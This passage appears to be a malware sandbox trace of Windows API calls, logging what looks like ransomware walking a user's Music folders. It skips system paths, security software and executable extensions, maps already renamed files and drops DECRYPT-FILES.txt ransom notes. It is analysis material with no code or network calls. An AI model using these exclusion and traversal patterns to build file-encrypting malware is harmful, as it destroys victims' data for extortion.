(lpString="F_CLZ29qIc0hWf92.wav.1hdvP") returned 26 [0185.894] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\" [0185.894] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpString2="F_CLZ29qIc0hWf92.wav.1hdvP" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\F_CLZ29qIc0hWf92.wav.1hdvP") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\F_CLZ29qIc0hWf92.wav.1hdvP" [0185.894] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.894] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\F_CLZ29qIc0hWf92.wav.1hdvP" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\raz7\\f_clz29qic0hwf92.wav.1hdvp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.894] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=33838) returned 1 [0185.894] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.894] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.895] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.895] CloseHandle (hObject=0x268) returned 1 [0185.895] CloseHandle (hObject=0x264) returned 1 [0185.895] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.895] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdaf441f0, ftCreationTime.dwHighDateTime=0x1d4c585, ftLastAccessTime.dwLowDateTime=0xd1798570, ftLastAccessTime.dwHighDateTime=0x1d4cdd4, ftLastWriteTime.dwLowDateTime=0xaf416880, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x2224, dwReserved0=0x0, dwReserved1=0x0, cFileName="f_l6zxQPIZe3sHzvN.wav.4O00n1A", cAlternateFileName="F_L6ZX~1.4O0")) returned 1 [0185.895] lstrcmpiW (lpString1="f_l6zxQPIZe3sHzvN.wav.4O00n1A", lpString2="DECRYPT-FILES.txt") returned 1 [0185.895] lstrcmpiW (lpString1="f_l6zxQPIZe3sHzvN.wav.4O00n1A", lpString2="autorun.inf") returned 1 [0185.895] lstrcmpiW (lpString1="f_l6zxQPIZe3sHzvN.wav.4O00n1A", lpString2="boot.ini") returned 1 [0185.895] lstrcmpiW (lpString1="f_l6zxQPIZe3sHzvN.wav.4O00n1A", lpString2="desktop.ini") returned 1 [0185.895] lstrcmpiW (lpString1="f_l6zxQPIZe3sHzvN.wav.4O00n1A", lpString2="ntuser.dat") returned -1 [0185.896] lstrcmpiW (lpString1="f_l6zxQPIZe3sHzvN.wav.4O00n1A", lpString2="iconcache.db") returned -1 [0185.896] lstrcmpiW (lpString1="f_l6zxQPIZe3sHzvN.wav.4O00n1A", lpString2="bootsect.bak") returned 1 [0185.896] lstrcmpiW (lpString1="f_l6zxQPIZe3sHzvN.wav.4O00n1A", lpString2="ntuser.dat.log") returned -1 [0185.896] lstrcmpiW (lpString1="f_l6zxQPIZe3sHzvN.wav.4O00n1A", lpString2="thumbs.db") returned -1 [0185.896] lstrcmpiW (lpString1="f_l6zxQPIZe3sHzvN.wav.4O00n1A", lpString2="Bootfont.bin") returned 1 [0185.896] lstrlenW (lpString="f_l6zxQPIZe3sHzvN.wav.4O00n1A") returned 29 [0185.896] lstrcmpiW (lpString1="4O00n1A", lpString2="lnk") returned -1 [0185.896] lstrcmpiW (lpString1="4O00n1A", lpString2="exe") returned -1 [0185.896] lstrcmpiW (lpString1="4O00n1A", lpString2="sys") returned -1 [0185.896] lstrcmpiW (lpString1="4O00n1A", lpString2="dll") returned -1 [0185.896] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\") returned 41 [0185.896] lstrlenW (lpString="f_l6zxQPIZe3sHzvN.wav.4O00n1A") returned 29 [0185.896] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\" [0185.896] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpString2="f_l6zxQPIZe3sHzvN.wav.4O00n1A" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\f_l6zxQPIZe3sHzvN.wav.4O00n1A") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\f_l6zxQPIZe3sHzvN.wav.4O00n1A" [0185.896] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.896] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\f_l6zxQPIZe3sHzvN.wav.4O00n1A" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\raz7\\f_l6zxqpize3shzvn.wav.4o00n1a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.896] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=8740) returned 1 [0185.896] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.897] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.897] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.897] CloseHandle (hObject=0x268) returned 1 [0185.897] CloseHandle (hObject=0x264) returned 1 [0185.897] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.898] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdaf441f0, ftCreationTime.dwHighDateTime=0x1d4c585, ftLastAccessTime.dwLowDateTime=0xd1798570, ftLastAccessTime.dwHighDateTime=0x1d4cdd4, ftLastWriteTime.dwLowDateTime=0xaf416880, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x2224, dwReserved0=0x0, dwReserved1=0x0, cFileName="f_l6zxQPIZe3sHzvN.wav.4O00n1A", cAlternateFileName="F_L6ZX~1.4O0")) returned 0 [0185.898] FindClose (in: hFindFile=0x4798b8 | out: hFindFile=0x4798b8) returned 1 [0185.898] CloseHandle (hObject=0x25c) returned 1 [0185.898] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7536a150, ftCreationTime.dwHighDateTime=0x1d4d278, ftLastAccessTime.dwLowDateTime=0xaf736560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf736560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zUt2ThE-zNirRyoAwYp", cAlternateFileName="ZUT2TH~1")) returned 1 [0185.898] lstrcmpW (lpString1="zUt2ThE-zNirRyoAwYp", lpString2=".") returned 1 [0185.903] lstrcmpW (lpString1="zUt2ThE-zNirRyoAwYp", lpString2="..") returned 1 [0185.903] lstrcatW (in: lpString1="zUt2ThE-zNirRyoAwYp", lpString2="\\" | out: lpString1="zUt2ThE-zNirRyoAwYp\\") returned="zUt2ThE-zNirRyoAwYp\\" [0185.903] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="zUt2ThE-zNirRyoAwYp\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\" [0185.903] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="\\Program Files") returned 0x0 [0185.903] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch=":\\Windows") returned 0x0 [0185.903] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="\\Games\\") returned 0x0 [0185.903] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.903] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.904] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.904] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.904] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.904] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="\\All Users") returned 0x0 [0185.904] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.904] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.904] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.904] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="AhnLab") returned 0x0 [0185.904] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.904] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\") returned 56 [0185.904] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.904] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\\\0a16c9.tmp") returned 67 [0185.904] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0185.906] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\") returned 56 [0185.906] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.906] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\\\DECRYPT-FILES.txt") returned 74 [0185.906] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.906] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\") returned 56 [0185.906] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\*" [0185.906] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7536a150, ftCreationTime.dwHighDateTime=0x1d4d278, ftLastAccessTime.dwLowDateTime=0xf183b040, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf183b040, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0185.906] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0185.906] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7536a150, ftCreationTime.dwHighDateTime=0x1d4d278, ftLastAccessTime.dwLowDateTime=0xf183b040, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf183b040, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.906] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0185.906] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0185.906] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf183b040, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf183b040, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf183b040, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0185.907] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0185.907] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0185.907] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0185.907] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0185.907] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0185.907] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0185.907] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0185.907] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0185.907] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0185.907] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0185.907] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.907] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0185.907] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0185.907] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0185.907] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0185.907] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\") returned 56 [0185.907] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.907] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\" [0185.907] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\0a16c9.tmp" [0185.907] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.907] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.907] CloseHandle (hObject=0x0) returned 0 [0185.907] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.908] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3876e740, ftCreationTime.dwHighDateTime=0x1d4ce02, ftLastAccessTime.dwLowDateTime=0xaf62bbc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf62bbc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="COGT", cAlternateFileName="")) returned 1 [0185.908] lstrcmpW (lpString1="COGT", lpString2=".") returned 1 [0185.908] lstrcmpW (lpString1="COGT", lpString2="..") returned 1 [0185.908] lstrcatW (in: lpString1="COGT", lpString2="\\" | out: lpString1="COGT\\") returned="COGT\\" [0185.908] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpString2="COGT\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" [0185.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="\\Program Files") returned 0x0 [0185.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch=":\\Windows") returned 0x0 [0185.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="\\Games\\") returned 0x0 [0185.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="\\All Users") returned 0x0 [0185.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="AhnLab") returned 0x0 [0185.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.908] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned 61 [0185.908] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.908] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\\\0a16c9.tmp") returned 72 [0185.908] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x264 [0185.910] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned 61 [0185.910] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.910] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\\\DECRYPT-FILES.txt") returned 79 [0185.910] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.911] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned 61 [0185.911] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\*" [0185.911] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\*", lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3876e740, ftCreationTime.dwHighDateTime=0x1d4ce02, ftLastAccessTime.dwLowDateTime=0xf183b040, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf183b040, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798f8 [0185.911] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0185.911] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3876e740, ftCreationTime.dwHighDateTime=0x1d4ce02, ftLastAccessTime.dwLowDateTime=0xf183b040, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf183b040, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.911] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0185.911] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0185.911] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf183b040, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf183b040, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf183b040, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0185.911] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0185.911] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0185.911] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0185.911] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0185.911] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0185.911] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0185.911] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0185.911] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0185.911] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0185.911] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0185.911] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.911] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0185.911] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0185.911] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0185.911] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0185.911] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS 